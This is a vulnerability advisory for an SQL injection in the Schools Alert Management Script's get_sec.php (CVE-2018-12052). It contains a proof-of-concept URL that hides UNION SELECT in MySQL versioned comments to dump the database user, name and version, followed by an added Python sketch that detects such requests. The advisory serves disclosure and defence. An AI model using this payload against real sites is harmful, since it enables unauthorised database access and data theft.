=================
Schools Alert Management Script - get_sec.php SQL Injection
Date: 07.06.2018
Vendor Homepage: https://www.phpscriptsmall.com/
Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/
Category: Web Application
Exploit Author: xiaotian.wang From DBAppSecurity
Tested on: Linux Mint
CVE: CVE-2018-12052
=================
Vulnerable cgi:
get_sec.php?q=[sqli]
=================
Proof of Concept:
/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23
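=================
Detection example (added here, not part of the original advisory or the vendor's code): the proof of concept wraps `union` and `concat` in MySQL versioned comments, which hides the keywords from a filter that matches `union select` on the raw parameter. The Python sketch below unwraps those comments before matching; the function names, the returned labels and the sample request lines are assumptions made for the illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# MySQL executes the body of /*!NNNNN ... */ when the server version is at
# least NNNNN, so the comment must be unwrapped, not discarded, before matching.
VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\b(?:\s+(?:all|distinct))?\s+select\b", re.I)

def normalize(value):
    """Unwrap versioned comments, blank plain comments, collapse whitespace."""
    value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()

def flag_request(request_uri, script="/get_sec.php", param="q"):
    """Return labels (hypothetical names) describing why a request is suspicious."""
    parts = urlsplit(request_uri)
    if not parts.path.endswith(script):
        return []
    reasons = []
    # parse_qsl percent-decodes and turns '+' into a space, as PHP does for $_GET
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        if name != param:
            continue
        if VERSIONED.search(raw):
            reasons.append("versioned-comment")
        if UNION_SELECT.search(normalize(raw)):
            # keyword visible only after unwrapping means it was hidden on purpose
            hidden = UNION_SELECT.search(raw) is None
            reasons.append("union-select-obfuscated" if hidden else "union-select")
    return reasons

# Constructed request lines; the second is the advisory's proof-of-concept URI.
SAMPLES = [
    "/get_sec.php?q=12",
    "/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/"
    "(user(),0x7e7e,database(),0x7e7e,@@version)%23",
    "/get_sec.php?q=1+union+select+1",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(flag_request(uri), uri)
```

A rule like this helps find attempts in access logs; it supplements, and does not replace, binding `q` as a query parameter in the script itself.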
